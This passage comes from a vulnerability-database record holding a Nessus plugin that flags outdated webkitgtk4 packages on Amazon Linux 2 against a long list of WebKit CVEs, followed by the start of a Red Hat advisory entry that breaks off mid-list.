(CVE-2019-8649)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 12.4, macOS Mojave\n 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud\n for Windows 10.6. Processing maliciously crafted web content may lead to universal cross site scripting.\n (CVE-2019-8658)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13,\n iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8666, CVE-2019-8671, CVE-2019-8673, CVE-2019-8677, CVE-2019-8678, CVE-2019-8679, CVE-2019-8680,\n CVE-2019-8681, CVE-2019-8686, CVE-2019-8687)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for\n Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2019-8669, CVE-2019-8672, CVE-2019-8676, CVE-2019-8683, CVE-2019-8688, CVE-2019-8689)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13, Safari 13.\n Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8674)\n\n - A logic issue existed in the handling of document loads. This issue was addressed with improved state\n management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for\n Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web\n content may lead to universal cross site scripting. (CVE-2019-8690)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8707, CVE-2019-8726,\n CVE-2019-8733, CVE-2019-8735)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n iCloud for Windows 11.0. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8710)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n watchOS 6.1. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8743, CVE-2019-8765)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.1 and iPadOS 13.1, tvOS 13, Safari 13.0.1, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud\n for Windows 7.14. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8763)\n\n - A logic issue was addressed with improved state management. This issue is fixed in watchOS 6.1. Processing\n maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8764)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n watchOS 6.1, iCloud for Windows 11.0. Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2019-8766)\n\n - Clear History and Website Data did not clear the history. The issue was addressed with improved data\n deletion. This issue is fixed in macOS Catalina 10.15. A user may be unable to delete browsing history\n items. (CVE-2019-8768)\n\n - An issue existed in the drawing of web page elements. The issue was addressed with improved logic. This\n issue is fixed in iOS 13.1 and iPadOS 13.1, macOS Catalina 10.15. Visiting a maliciously crafted website\n may reveal browsing history. (CVE-2019-8769)\n\n - This issue was addressed with improved iframe sandbox enforcement. This issue is fixed in Safari 13.0.1,\n iOS 13. Maliciously crafted web content may violate iframe sandboxing policy. (CVE-2019-8771)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8782)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0,\n iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8783, CVE-2019-8814, CVE-2019-8815, CVE-2019-8819, CVE-2019-8821, CVE-2019-8822, CVE-2019-8823)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8808, CVE-2019-8812)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for\n Windows 11.0, iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2019-8811, CVE-2019-8816, CVE-2019-8820)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13.2 and iPadOS\n 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0. Processing\n maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8813)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n tvOS 13.3, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows,\n iCloud for Windows 7.16. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8835)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n tvOS 13.3, watchOS 6.1.1, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3\n for Windows, iCloud for Windows 7.16. Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2019-8844)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 13.3,\n iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows, iCloud for\n Windows 7.16. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8846)\n\n - WebKitGTK through 2.26.4 and WPE WebKit through 2.26.4 (which are the versions right before 2.28.0)\n contains a memory corruption issue (use-after-free) that may lead to arbitrary code execution. This issue\n has been fixed in 2.28.0 with improved memory handling. (CVE-2020-10018)\n\n - A use-after-free issue exists in WebKitGTK before 2.28.1 and WPE WebKit before 2.28.1 via crafted web\n content that allows remote attackers to execute arbitrary code or cause a denial of service (memory\n corruption and application crash). (CVE-2020-11793)\n\n - A denial of service issue was addressed with improved memory handling. This issue is fixed in iOS 13.3.1\n and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud\n for Windows 7.17. A malicious website may be able to cause a denial of service. (CVE-2020-3862)\n\n - A logic issue was addressed with improved validation. This issue is fixed in iCloud for Windows 7.17,\n iTunes 12.10.4 for Windows, iCloud for Windows 10.9.2, tvOS 13.3.1, Safari 13.0.5, iOS 13.3.1 and iPadOS\n 13.3.1. A DOM object context may not have had a unique security origin. (CVE-2020-3864)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0,\n iCloud for Windows 7.17. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3865, CVE-2020-3868)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13.3.1 and iPadOS\n 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for\n Windows 7.17. Processing maliciously crafted web content may lead to universal cross site scripting.\n (CVE-2020-3867)\n\n - A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4,\n tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A\n file URL may be incorrectly processed. (CVE-2020-3885)\n\n - A race condition was addressed with additional validation. This issue is fixed in iOS 13.4 and iPadOS\n 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows\n 7.18. An application may be able to read restricted memory. (CVE-2020-3894)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and\n iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3,\n iCloud for Windows 7.18. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3895, CVE-2020-3900)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and\n iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3,\n iCloud for Windows 7.18. A remote attacker may be able to cause arbitrary code execution. (CVE-2020-3897)\n\n - A memory consumption issue was addressed with improved memory handling. This issue is fixed in iOS 13.4\n and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows\n 10.9.3, iCloud for Windows 7.18. A remote attacker may be able to cause arbitrary code execution.\n (CVE-2020-3899)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and\n iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3,\n iCloud for Windows 7.18. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3901)\n\n - An input validation issue was addressed with improved input validation. This issue is fixed in iOS 13.4\n and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for\n Windows 7.18. Processing maliciously crafted web content may lead to a cross site scripting attack.\n (CVE-2020-3902)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALAS-2020-1563.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-11070\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-6237\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-6251\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8506\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8524\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8535\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8536\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8544\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8551\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8558\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8559\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8563\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8571\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8583\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8584\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8586\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8587\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8594\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8595\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8596\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8597\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8601\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8607\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8608\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8609\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8611\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8615\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8619\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8622\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8623\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8625\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8644\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8649\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8658\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8666\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8669\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8671\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8672\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8673\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8674\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8676\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8677\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8678\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8679\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8680\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8681\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8683\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8684\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8686\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8687\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8688\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8689\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8690\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8707\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8710\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8719\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8720\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8726\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8733\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8735\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8743\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8763\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8764\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8765\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8766\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8768\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8769\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8771\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8782\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8783\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8808\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8811\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8812\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8813\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8814\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8815\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8816\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8819\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8820\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8821\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8822\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8823\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8835\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8844\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8846\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-10018\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11793\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3862\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3864\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3865\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3867\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3868\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3885\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3894\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3895\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3897\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3899\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3900\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3901\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3902\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update webkitgtk4' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3899\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-10018\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:webkitgtk4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:webkitgtk4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:webkitgtk4-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:webkitgtk4-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:webkitgtk4-jsc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\npkgs = [\n {'reference':'webkitgtk4-2.28.2-2.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'webkitgtk4-2.28.2-2.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'webkitgtk4-2.28.2-2.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'webkitgtk4-debuginfo-2.28.2-2.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'webkitgtk4-debuginfo-2.28.2-2.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'webkitgtk4-debuginfo-2.28.2-2.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'webkitgtk4-devel-2.28.2-2.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'webkitgtk4-devel-2.28.2-2.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'webkitgtk4-devel-2.28.2-2.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'webkitgtk4-doc-2.28.2-2.amzn2.0.1', 'release':'AL2'},\n {'reference':'webkitgtk4-jsc-2.28.2-2.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'webkitgtk4-jsc-2.28.2-2.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'webkitgtk4-jsc-2.28.2-2.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'webkitgtk4-jsc-devel-2.28.2-2.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'webkitgtk4-jsc-devel-2.28.2-2.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'webkitgtk4-jsc-devel-2.28.2-2.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4 / webkitgtk4-debuginfo / webkitgtk4-devel / etc\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-06T15:11:32", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2020:4035 advisory.\n\n - webkitgtk: HTTP proxy setting deanonymization information disclosure (CVE-2019-11070)\n\n - webkitgtk: Multiple memory corruption issues leading to arbitrary code execution (CVE-2019-6237, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8644, CVE-2019-8666, CVE-2019-8669, CVE-2019-8671, CVE-2019-8672, CVE-2019-8673, CVE-2019-8676, CVE-2019-8677, CVE-2019-8678, CVE-2019-8679, CVE-2019-8680, CVE-2019-8681, CVE-2019-8683, CVE-2019-8684, CVE-2019-8686, CVE-2019-8687, CVE-2019-8688, CVE-2019-8689, CVE-2019-8707, CVE-2019-8710, CVE-2019-8720, CVE-2019-8726, CVE-2019-8733, CVE-2019-8735, CVE-2019-8763, CVE-2019-8765, CVE-2019-8766, CVE-2019-8782, CVE-2019-8783, CVE-2019-8808, CVE-2019-8811, CVE-2019-8812, CVE-2019-8814, CVE-2019-8815, CVE-2019-8816, CVE-2019-8819, CVE-2019-8820, CVE-2019-8821, CVE-2019-8822, CVE-2019-8823, CVE-2020-3868)\n\n - webkitgtk: processing maliciously crafted web content lead to URI spoofing (CVE-2019-6251)\n\n - webkitgtk: malicous web content leads to arbitrary code execution (CVE-2019-8506)\n\n - webkitgtk: malicious web content leads to arbitrary code execution (CVE-2019-8524, CVE-2019-8559, CVE-2019-8563)\n\n - webkitgtk: malicious crafted web content leads to arbitrary code execution (CVE-2019-8535, CVE-2019-8536, CVE-2019-8558)\n\n - webkitgtk: malicious crafted web content leads to arbitrary we content (CVE-2019-8544)\n\n - webkitgtk: malicious web content leads to cross site scripting (CVE-2019-8551)\n\n - webkitgtk: Out-of-bounds read leading to memory disclosure (CVE-2019-8607)\n\n - webkitgtk: Incorrect state management leading to universal cross-site scripting (CVE-2019-8625, CVE-2019-8649, CVE-2019-8658, CVE-2019-8674, CVE-2019-8690, CVE-2019-8719, CVE-2019-8813, CVE-2020-3867)\n\n - webkitgtk: Multiple memory corruption issues leading to arbitrary code execution (CVE-2019-8743)\n\n - webkitgtk: Incorrect state management leading to universal cross-site scripting (CVE-2019-8764)\n\n - webkitgtk: Browsing history could not be deleted (CVE-2019-8768)\n\n - webkitgtk: Websites could reveal browsing history (CVE-2019-8769)\n\n - webkitgtk: Violation of iframe sandboxing policy (CVE-2019-8771)\n\n - webkitgtk: Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2019-8835, CVE-2019-8844)\n\n - webkitgtk: Use after free issue may lead to remote code execution (CVE-2019-8846)\n\n - webkitgtk: 